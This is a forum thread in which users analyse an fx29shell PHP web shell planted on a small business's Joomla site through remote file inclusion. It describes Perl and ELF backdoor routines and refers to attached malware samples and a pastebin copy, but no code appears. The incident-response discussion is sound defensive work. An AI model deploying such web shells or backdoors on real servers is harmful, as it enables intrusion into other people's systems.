Hi there,

today I found an interesting on a client's website.
The original was renamed to ~ and the malicious one tried to send email all day. Fortunately (for the client) the email address was not valid. I guess the site was compromised via an outdated Joomla installation.
The evil .php file also tried to backdoor the host. There are two backdoor routines - one in Perl and one in C (Base64 encoded ELF file). Due to the invalid email there was no further damage. At least I didn't find any other easteregg so far. I attach the file here.
Right now I'm waiting for midnight because this is the time when the logs are provided for today (infection was right after midnight), so I might find out, how the infection was done.
It's fx29shell by Fatalz or FaTaLisTiCz.

darkelf

edit: I just found out that the sever was infected using RFI (Remote File Inclusion).
This is the first time I hear about this technique and I find it pretty scary because of it's simplicity.

MALWARE
Password: malware

Hi

Thanks for the change of pace. I haven't looked at it closely yet but from the multitude of google hits it looks somewhat similar to the c99.php shell.

C99 is something I found out about from the book Detecting Malice by RSnake, http://ha.ckers.org/

If you're not familiar with it I recommend finding a copy of the book and browsing around that site (whitehat).




I'll try running it later on my WAMP setup and see what happens. Please post any further info if anyone digs into it deeper.

Regards,
Kayaker

Howdy,

I see this shit almost daily. I just checked another one a few minutes ago.
Another server I maintain unrelated to this place was infected with same type of exploit. The funny thing was they put the scripts in the image folder.
They didnt use anything intelligent when naming the file so it was pretty obvious when I saw it was being called in the log files.
I hardened PHP to stop it.

Beware when hardening PHP, there seems to be a fine line between not enough and too much.

Woodmann

Hi guys,

I guess the reason why I didn't come across this yet, is my client's site being really unimportant. He is running a small real-estate company. I think it was a script-kiddie making some automated scan and exploit. What nags me is, that I'm unable to find anything suspicious in the logs. At the time when infection happened, I see only a chain of calls from a proxy (brazil based), but none of the calls looks unusual. Nothing like the call Kayaker posted - nothing that points away from the server. So I'm still clueless how this guy managed to come in. Well, I'm fairly sure it was this RFI thingy and that's quite an itch where I can't scratch . If I find something, I will let you know and if someone wants to see the log, please tell me (I will only remove the sitename).

@kayaker

Thank you very much for the link. I will try to get a copy of this book. It looks like an interesting read.

Best regards
darkelf

If the hackers gained control of the server, they may very well have cleaned out the sensitive parts of the log files before you got to them.

Also, if the payload was injected by means of a POST request, you won't necessarily see anything special in the web logs to begin with.

I suppose it depends on your level of logging.

I dont think they are that technical to remove log entries.


Woodmann

Hi dELTA,

the server in question is a shared-host were the logfile of a day is provided when the day is over. Usually a few minutes after midnight. I noticed the infection the same day it happened, so they were not able to clean the logs. The other logs were also untouched. I'm sure that the calls from brazil are the ones in charge. Among these, there is also a single POST request (the ONLY one in the whole logfile). I'm not very skilled when it comes to webhacking, but I'm trying to dig a bit deeper, now that I'm affected .

Best regards
darkelf

That's actually very cool. I was going to attach a snapshot of what it looks like on my Windows system but it doesn't come out very well. If interested google for 'Fx29Sh' and look for a black GUI/green text showing a victims directory listing.

Actually, here's an example image

http://www.martinsecurity.net/2009/05/17/17400-sites-affected-by-fx29-rfi-pt2/

and another version of the script (sans backdoor)

http://pastebin.com/xLCG0dpG


I extracted the base64 encoded 'backdoor' functions and have attached them for interest. 'Backc' and 'Shdb' are ELF files, 'Back' is a Perl script. The small php script I used to decode them, basically ripped from the main file, is included. Even the icon images are base64 encoded and rendered inline.

I was doing the same as Kayaker yesterday,

as for logs, no big surprise that it doesn't shows anything interesting, look at that.



It is not only looking/acting like c99 shell but also r57 and w4ck1ng shells.